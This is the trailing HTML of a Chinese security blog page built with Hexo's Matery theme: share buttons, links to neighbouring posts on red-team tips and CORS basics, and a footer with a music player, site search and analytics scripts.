                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2023/08/25/%E7%BA%A2%E9%98%9F%E5%8F%8D%E8%93%9D%E9%98%9F%E5%8F%8D%E5%88%B6%E5%B0%8F%E6%8A%80%E5%B7%A7/">
                    <div class="card-image">
                        
                        <img src="/medias/featureimages/8.jpg" class="responsive-img" alt="红队反蓝队反制小技巧">
                        
                        <span class="card-title">红队反蓝队反制小技巧</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            burp存在指纹，蓝队会捕捉到，建议修改。
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2023-08-25
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97/" class="post-category">
                                    红蓝对抗
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E7%BA%A2%E9%98%9Ftips/">
                        <span class="chip bg-color">红队tips</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/04/26/%E8%B7%A8%E5%9F%9F%E8%B5%84%E6%BA%90%E5%85%B1%E4%BA%AB%20CORS/">
                    <div class="card-image">
                        
                        <img src="/medias/featureimages/9.jpg" class="responsive-img" alt="CORS漏洞（1）：前置知识">
                        
                        <span class="card-title">CORS漏洞（1）：前置知识</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            cors跨域资源共享漏洞的前置知识：同源概念、同源要素、跨域、JSONP等基础内容。
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-04-26
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Web%E5%AE%89%E5%85%A8/" class="post-category">
                                    Web安全
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E6%BC%8F%E6%B4%9E/">
                        <span class="chip bg-color">漏洞</span>
                    </a>
                    
                    <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86/">
                        <span class="chip bg-color">漏洞前置知识</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>



<!-- 代码语言 -->


<!-- 代码块复制 -->


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4, h5'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
    });
</script>

    

</main>



    </main>

    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="7312308301"
                   fixed='true'
                   autoplay='true'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.5'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2024</span>
            
            <a href="/about" target="_blank">highgerms</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/highgerms" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>













    <a href="https://cdn.jsdelivr.net/gh/highgerms/Picture_blog_highgerms@main/image-20240229185354090.png" class="tooltipped" target="_blank" data-tooltip="快来看看我的公众号呀~~" data-position="top" data-delay="50">
        <i class="fab fa-weibo"></i>
    </a>





</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
